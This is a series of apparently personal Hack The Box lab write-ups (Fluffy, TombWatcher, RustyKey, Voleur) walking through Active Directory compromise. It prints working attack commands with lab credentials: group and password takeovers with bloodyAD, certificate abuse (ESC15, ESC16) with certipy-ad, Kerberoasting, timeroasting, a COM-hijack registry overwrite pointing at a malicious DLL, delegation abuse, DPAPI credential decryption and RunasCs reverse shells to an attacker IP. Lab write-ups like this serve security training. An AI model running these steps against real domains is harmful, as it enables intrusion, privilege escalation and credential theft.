
In here we find the following juicy stuff:

It appears to be a base64 encrypted bcrypt hash, let's crack it.

backrest_root
!@#$%^

EZ PZ.

:::fail Not so fast, unfortunately this password did not give us root access: :::

Port Forwarding

I then realized that I needed the password elsewhere, I'm supposed to port forward the local 9898 port for the backrest api so I can reach it from Kali.

For this I downloaded over the ligolo agent:

Backrest API

Now I could reach the port on 240.0.0.1:9898:

And we get inside with the previously found creds:

Here we fill out the following, and leave the rest as default

Now we can use the following to run commands:

Using the help command we can get a list of all available commands:

This way we can go ahead and use the following to back up root's .ssh folder:

Next up we can check the mentioned snapshot:

We can dump the id_rsa:

ssh as root

root.txt

HTB-Fluffy

Maxim Andrei Koltypin — Thu, 26 Jun 2025 00:00:00 GMT

Scope:
10.10.11.69

Creds:
j.fleischman / J0elTHEM4n1990!

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn fluffy.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-06-26 23:24:11Z)
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-26T23:25:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-26T23:25:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49693/tcp open  msrpc         syn-ack Microsoft Windows RPC
49707/tcp open  msrpc         syn-ack Microsoft Windows RPC
49724/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

BloodHound

I'll start off by enumerating everything using bloodhound-ce-python, this way the whole db can populate while I'm doing the rest of enumeration.

445/TCP - SMB

I went on and downloaded everything:

First I checked out the .pdf file.

Here we get an overview of all the recently found vulnerabilities, if we're lucky these are not patched and we could still exploit them:

I started enumerating them from top to bottom and found that the second one in the list could be the one I'm looking for:

Since this is exactly the premise that we're in with the found .zip file we can get to cookin:

I found a non-bloated version of the PoC here:

I downloaded it and started exploiting:

PoC

We can now upload it and catch the response with responder when we have uploaded it to the smb share:

p.agila
prometheusx-303

Adding p.agila to SERVICE ACCOUNTS

Back in BloodHound I found the following for this user:

But most importantly:

And here we find out that we can add ourselves to the Service Accounts group. I will do this using bloodyAD:

bloodyAD -u 'p.agila' -p 'prometheusx-303' -d 'fluffy.htb' --dc-ip 10.10.11.69 add groupMember 'SERVICE ACCOUNTS' p.agila

Shadow Credentials Attack

As per BloodHound I will now have to do the following:

Instead of pywhisker.py however I used certipy-ad for all three users in order to get all 3 hashes right away so I could log in with them later:

# Just change the account names in --account
certipy-ad shadow auto -u "p.agila@fluffy.htb" -p "prometheusx-303" -account 'WINRM_SVC'  -dc-ip '10.10.11.69'

Neither could be cracked so pass-the-hash it is:

Foothold

evil-winrm

user.txt

Here I found the user.txt flag:

Enumeration

But other than that pretty useless:

:::caution Problem was however that none of the other accounts could log in via winrm, so I had to think of something else. :::

We do find the following juicy stuff:

CA_SVC is a certificate service account, let's see what we can do with it:

certipy-ad find -u 'CA_SVC@fluffy.htb' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8'  -stdout -vulnerable -dc-ip 10.10.11.69

It seems to be vulnerable to ESC16!

:::note This blog post goes in detail about exploiting this vulnerability. :::

ESC16 Abuse

Forging Administrator UPN

certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -upn 'administrator' -user 'ca_svc' update -dc-ip 10.10.11.69

Now that that is done we can verify the change with the read command:

Good, onto the next part.

Request Certificate as Administrator

certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303'  -account 'ca_svc' auto -dc-ip 10.10.11.69

Now that we have exported the krb5 ticket we can request the certificate:

certipy-ad req -k -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

Bingo.

Privilege Escalation

Restore CA_SVC account

We can now restore the account as follows:

certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update -dc-ip 10.10.11.69

Persistence

I can now go ahead and modify the Administrator password in order to gain a backdoor in the system:

certipy-ad auth -pfx administrator.pfx -username 'administrator' -dc-ip 10.10.11.69 -domain fluffy.htb -ldap-shell

:::note You can use the command without -ldap-shell and it will give you the NTLM hash instead: :::

evil-winrm as Administrator

I am now successfully logged in as Administrator, let's get root.txt:

root.txt

HTB-TombWatcher

Maxim Andrei Koltypin — Thu, 26 Jun 2025 00:00:00 GMT

Scope:
10.10.11.72

Creds:
henry / H3nry_987TGV!

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -Pn -T5 --min-rate=5000 tomb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-06-12 17:52:41Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1/domainComponent=tombwatcher
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1/domainComponent=tombwatcher
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1/domainComponent=tombwatcher
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-12T17:54:10+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1/domainComponent=tombwatcher
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49691/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
49712/tcp open  msrpc         syn-ack Microsoft Windows RPC
49727/tcp open  msrpc         syn-ack Microsoft Windows RPC
49742/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-12T17:53:30
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20899/tcp): CLEAN (Timeout)
|   Check 2 (port 33382/tcp): CLEAN (Timeout)
|   Check 3 (port 61752/udp): CLEAN (Timeout)
|   Check 4 (port 60574/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s

445/TCP - SMB

I can't find anything interesting.

BloodHound

I tried spraying the creds elsewhere but had no access so I decided to boot up bloodhound:

This way I want to find out whether there's any kerberoastable users, or anything else juicy for that matter.

I then started off by adding henry to my list of owned users:

I then used the Shortest Path from Owned cypher and got the following:

I found some new users:

alfred
sam
john

:::note This means we can get easy access as alfred by using the targetedKerberoast.py script and cracking the hash. :::

Targeted Kerberoast

python3 targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!' --request-user 'alfred' --dc-ip tombwatcher.htb > alfred.hash

This error popped up because the target and my machine were out of sync.

Clock Fix

In order to fix this I went ahead and used the following command to sync:

Afterwards the command ran fine:

John

Time to use john to crack the hash.

alfred
basketball

One more set of creds to add to our spraying list.

:::note this yet again yielded no interesting entry point. :::

Time to check bloodhound again:

Adding Alfred to INFRASTRUCTURE

We need to issue the following commands.

# Change group
bloodyAD -u 'alfred' -p 'basketball' -d 'tombwatcher.htb' --dc-ip 10.10.11.72 add groupMember 'INFRASTRUCTURE' alfred

# Verify change
net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb/Alfred"%"basketball" -S "DC01.tombwatcher.htb"

alfred has been successfully added and we can continue on down the chain.

I click on the link and download gMSADumper.py the script from the github page:

python3 gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'

And just like that I got the hash for ansible_dev.

Force Change Password

Next in line is sam, and to get to them we need to do the following:

For this I will once again be using bloodyAD:

bloodyAD -u 'ansible_dev$' -p ':4b21348ca4a9edff9689cdf75cbda439' -d 'tombwatcher.htb' --host 10.10.11.72 set password 'sam' 'password123'

Now we can log into winrm with sam.

:::fail ....or rather not?

:::

It keeps hanging then fails, I guess we need to keep going down the chain.

For this vector there's multiple sorts of abuse, but I'll try out the targeted kerberoast first.

However that didn't work, let's enumerate the other options.

Password change didn't work either.

User Takeover via ACL Abuse

Instead we'll have to use the following sequence of events in order to takeover john's account by abusing the ACL privileges:

bloodyAD -u 'sam' -p 'password123' -d 'tombwatcher.htb' --host 10.10.11.72 set owner john sam                  

bloodyAD -u 'sam' -p 'password123' -d 'tombwatcher.htb' --host 10.10.11.72 add genericAll john sam                                                                                                                            bloodyAD -u 'sam' -p 'password123' -d 'tombwatcher.htb' --host 10.10.11.72 set password 'john' 'password123'

Now we can get on with logging in and getting the foothold!

Foothold

Evil-winrm as John

user.txt

Enumeration

Now it's time to further enumerate the machine:

No low hanging fruit.

bloodhound tells us the following, maybe we just need to finish following this chain.

I will now use the following command to enumerate previously deleted user accounts, specifically looking for any privileged users that were part of the ADCS (Active Directory Certificate Services) structure.

Get-ADObject -Filter {isDeleted -eq $true -and ObjectClass -eq "user"} -IncludeDeletedObjects -Properties samAccountName, objectSid, whenCreated, whenChanged, lastKnownParent | 
Select-Object Name, samAccountName, ObjectGUID, @{Name="SID";Expression={$_.objectSid}}, @{Name="Changed";Expression={$_.whenChanged}}, @{Name="LastKnown";Expression={$_.lastKnownParent}} | 
Format-Table -AutoSize -Wrap

[!TLDR] Explanation I am hunting for a previously deleted privileged user, likely tied to Certificate Services abuse (ESC1/ESC6/etc.). If I can restore cert_admin, I might:

Re-enable a privileged user account

Reuse known creds (password or cert)

Abuse enrollment rights or existing templates

So what does the above tell us?

There were multiple instances of a cert_admin account.
All were deleted, but the name and OU (ADCS) suggest it had elevated privileges related to certificate services.
If ADCS misconfigurations exist, this account might have left behind orphaned certificates or enrollments you can abuse.

Privilege Escalation

Restoring cert_admin

So we need to restore the last instance of the cert_admin account as follows, in order to leverage it and escalate privs.

Now that that is done we need to use bloodyAD again to set a new password for this account:

Not fully there yet however, we still cannot log into winrm with this user, since this is a certificate service account we need to use certipy-ad to find vulnerabilities that we can exploit.

This gives a lot of info, but the most important part is in the bottom:

According to the script the target is vulnerable to ESC15.

:::note More about this topic here :::

ESC15 Abuse

Forging Administrator Cert

Now we will use the following commands to forge new certificates and change the Administrator password:

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'password123' -target 'DC01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'Administrator' -application-policies 'Client Authentication'

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72 -domain tombwatcher.htb -ldap-shell

Now we can go ahead and use the newly set creds to log into evil-winrm as Administrator:

root.txt

HTB-RustyKey

Maxim Andrei Koltypin — Thu, 03 Jul 2025 00:00:00 GMT

Scope:
10.10.11.75

Creds:
rr.parker / 8#t5HE8L!W3A

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn rusty.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-04 03:14:33Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack Microsoft Windows RPC
49727/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-04T03:15:25
|_  start_date: N/A
|_clock-skew: 8h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 51928/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 22945/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 63867/udp): CLEAN (Failed to receive data)
|   Check 4 (port 40875/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Pass the Key - TGT

This was unsuccessful with the current user creds:

bloodhound-ce-python didn't work either:

So what now?

But first I had to make some quick changes in the /etc/krb5.conf file:

I can now fix the clock skew and get the tgt:

impacket-getTGT 'rustykey.htb/rr.parker' -dc-ip 10.10.11.75

BloodHound

Time to do some enumeration:

echo "10.10.11.75 dc.rustykey.htb" | sudo tee -a /etc/hosts 

bloodhound-ce-python -u rr.parker -p '8#t5HE8L!W3A' -ns 10.10.11.75 -c all -k -d rustykey.htb

Now I can start graphing it out.

:::note I couldn't really find anything useful for now, but I will definitely come back here :::

User Enum

I then proceded by using nxc in conjuncture with ldap in order to enumerate all the users on the domain:

nxc ldap rustykey.htb -u users.txt -p passwords.txt --users -k

:::note The backupadmin user stands out immediately, that might be our priv esc later on. :::

I added all of the above for my users list.

Timeroasting

So after being stuck on this part I went on and checked out some resources online on what I could do next. Here I found this article on timeroasting which I've never heard of before:

Very interesting read, to set up my attack I found this GitHub repo containing a python script:

I could run the command easily as follows:

python3 timeroast.py rustykey.htb

I went ahead and put these in a file and started cracking.

Hashcat (beta)

In order to crack this I needed a beta module of hashcat which included mode 31300 that could crack this hash format:

:::note I could easily find it here. :::

After unzipping the file I started cracking.

Rusty88!

Finding Corresponding Object ID

I now had a list of computers that I found through timeroasting:

I could check bloodhound and see which computers these Object ID's belong to:

I started enumerating them and found the cracked Object ID inside IT/COMPUTERS/COMPUTER-3:

Now I could add this computer to my list of owned principals.

I noticed that I could add myself to the HELPDESK group.

AddSelf

I tried it out using bloodyAD but got this error:

:::fail On closer inspection it makes sense that it failed: Machine accounts can’t authenticate via NTLM directly like regular user accounts in most cases—they are designed to use Kerberos tickets (machine authentication requires a valid TGT). :::

So, we need to request a TGT again.

impacket-getTGT 'rustykey.htb/IT-COMPUTER3$' -dc-ip 10.10.11.75

I retried the previous command with -k but got this error:

I had to specify the host in this case, the full command looks as follows:

bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' add groupMember HELPDESK 'IT-COMPUTER3$'

Great! I was able to add myself to the HELPDESK group, I can now move on to the next step.

I'd like to exploit bb.morgan in order to get RCE, however the following is bugging me:

The PROTECTED OBJECTS group might LIKELY interfere in this process.

Let's try it out.

ForceChangePassword - bb.morgan

I can easily change the password so that's good.

bb.morgan
password123!

:::important We now will have to get another kerb ticket in order to actually log in: :::

Simply requesting the ticket does not work:

This might in fact be due to the constraints of the PROTECTED OBJECTS group. Let's remove our user from it.

:::danger Sometimes it trips out and you'll have to repeat old commands again: :::

After resending the add groupMember command I issued the remove groupMember command for the PROTECTED OBJECTS group:

bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'IT'

And now I can send the password change and TGT commands again:

bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password 'bb.morgan' 'P@ssword123!'

impacket-getTGT 'rustykey.htb/bb.morgan':'P@ssword123!' -dc-ip 10.10.11.75

Foothold

Shell as bb.morgan

First I export the kerberos ticket and log into winrm via the same terminal.

And now I can go ahead and login via evil-winrm:

user.txt

Enumeration

Furthermore I find the following:

:::note Other than that my privs are absolutely dog tier: :::

PDF

Looks like we need to move Laterally to a member of the SUPPORT group in order to take advantage of this situation.

We'll have to remove the group from the PROTECTED OBJECTS first of all, then ForceChange the password of ee.reed.

Lateral Movement

ForceChangePassword - ee.reed

bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'

bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password 'ee.reed' 'P@ssword123!'
impacket-getTGT 'rustykey.htb/ee.reed':'P@ssword123!' -dc-ip 10.10.11.75

However this is where I ran into a problem:

Eventhough I changed the password correctly and exported the ticket I could still not login.

RunasCs

I downloaded the runascs binary and downloaded it over to the target:

I set up a listener:

I then executed the binary as follows:

.\RunasCs.exe ee.reed P@ssword123! powershell -r 10.10.14.17:4444

I got a shell:

:::success I successfully pivoted to ee.reed. :::

I checked back on bloodhound and found that the way to get to backupadmin was by exploiting mm.turner first:

:::note I had to move laterally towards mm.turner first, my guess would be via the following methods. :::

I focus in on this part that I found in the PDF.

:::important

COM objects for ZIP utilities (or compression tools) often register CLSIDs with the term "zip".
Many archiving tools (WinRAR, 7-Zip, built-in ZIP) register COM objects to integrate into context menus (right-click options like "Extract Here", "Compress", etc.).
If such registry keys are writable by low-privileged users (due to the "extended access"), an attacker can redirect the CLSID to load malicious DLLs or payloads instead—this is COM Hijacking. :::

If writable, attackers can:

Replace InprocServer32 path to point to malicious DLL.
Trigger the vulnerable app or COM call → DLL gets loaded as SYSTEM or elevated context.

Result: Privilege Escalation via COM Hijack.

COM Hijack

Registry

I went ahead to query the reg and view what I could find.

reg query HKCR\CLSID /s /f "zip"

I went ahead and reviewed the ACL's on the InprocServer32:

Get-Acl -Path "Registry::HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" | Format-List

This looks perfect for us, let's construct a .dll payload via msfvenom which will be used to hijack InprocServer32.

Overwriting InprocServer32

After craftig up the payload I can now upload it.

reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tools\hax2.dll" /f

:::important The .dll payload needs to be put in a location where every user has access to it! Otherwise it will not work. :::

Now that we have access as mm.turner we can move on to the next part.

It looks like we'll have to do some delagation magic.

Privilege Escalation

Resource Based Constrained Delegation (RBCD)

I'll start off with the following command:

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$

I then went ahead and used impacket-getST to get the service ticket for backupadmin:

impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'rustykey.htb/IT-COMPUTER3$:Rusty88!'

I can now export it and get access with it.

root.txt

HTB-Voleur

Maxim Andrei Koltypin — Sun, 06 Jul 2025 00:00:00 GMT

Scope:
10.10.11.76

Creds:
ryan.naylor / HollowOct31Nyt

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn voleur.htb 

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-06 22:15:11Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2222/tcp  open  ssh           syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
51685/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
51686/tcp open  msrpc         syn-ack Microsoft Windows RPC
51688/tcp open  msrpc         syn-ack Microsoft Windows RPC
51716/tcp open  msrpc         syn-ack Microsoft Windows RPC
62733/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48495/tcp): CLEAN (Timeout)
|   Check 2 (port 28661/tcp): CLEAN (Timeout)
|   Check 3 (port 60782/udp): CLEAN (Timeout)
|   Check 4 (port 35476/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h59m57s
| smb2-time: 
|   date: 2025-07-06T22:16:03
|_  start_date: N/A

I tried logging into ssh 2222 but got denied:

Pass The Key - TGT

I started off changing /etc/krb5.conf

BloodHound

I could now boot up bloodhound:

While the files were ingesting I commenced my recon.

Quite a few svc accounts which I made be able to take advantage of.

I went ahead and looked up which users had remote access:

Nevertheless I had to move on and check out what else I could find.

445/TCP - SMB

I find that I can read a bunch of shares! I'll check out the non-default IT share.

Right away I find an excel file that appears to be useful!

:::note I tried out smbclient but it wouldn't connect, instead I opted for impacket-smbclient: :::

John

Now it was time to crack the office hash:

I could now enter it in the prompt:

Excel file - Finding Creds

Out of all the creds the svc_ldap ones worked as well:

svc_ldap
M1XyC9pW7qT5Vn

Now that I know that that account has valid creds I return to bloodhound.

:::note Not only can we go ahead and WriteSPN on svc_winrm, but we can also GenericWrite via RESTORE_USERS to lacey.miller. This means we can reinstate todd.wolfe's account, and make him part of the domain admin group! :::

WriteSPN

Kerberoasting

I need to slightly modify the command for the request to work.

KRB5CCNAME=svc_ldap.ccache ./targetedKerberoast.py --dc-host DC.voleur.htb -d voleur.htb  --dc-ip 10.10.11.76 --request-user 'svc_winrm' -k

John

I was then able to easily crack it:

svc_winrm
AFireInsidedeOzarctica980219afi

Foothold

Shell as svc_winrm

Using the following sequence of commands I was able to get easy access:

user.txt

Lateral Movement

:::note In order to move laterally I have to download over RunasCs.exe, then I can go ahead and get an elevated shell as svc_ldap on the system, which in turn will allow me to restore the todd.wolfe account. :::

Restore Todd.Wolfe account

I can now use the following commands to restore the account:

Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects

Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

Shell as Todd.Wolfe

Now that the account has been restored I can yet again move laterally.

.\run.exe todd.wolfe NightT1meP1dg3on14  powershell -r 10.10.14.17:444

Slight problem however concerning my enum, I'd have to use bloodhound all over again since the account did not exist before:

DPAPI

Knowing that he's part of the second-line group however I went to the following directory:

I then transferred the following over:

C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3

As well as:

C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88

impacket-dpapi

I can first crack the key:

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password 'NightT1meP1dg3on14' -sid S-1-5-21-3927696377-1337352550-2781715495-1110

I can now crack the credentials:

impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

jeremy.combs
qT3V9pLXyN7W4m

I can now easily log in as jeremy:

Privilege Escalation

Enumeration

I started in the Third-Line Support folder:

I then download over the id_rsa and check who it belongs to:

ssh-keygen -lf id_rsa

I could easily get access:

Fortunately enough:

It was within the /mnt directory where I was able to find all the sweet stuff:

:::note I could essentially copy over NTDS.dit now and get the Admin password!

:::

To make my life easier I used sudo su and found the juicy stuff:

NTDS.dit

I copied it over using the following command:

scp -i id_rsa -P 2222 -r "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups" .

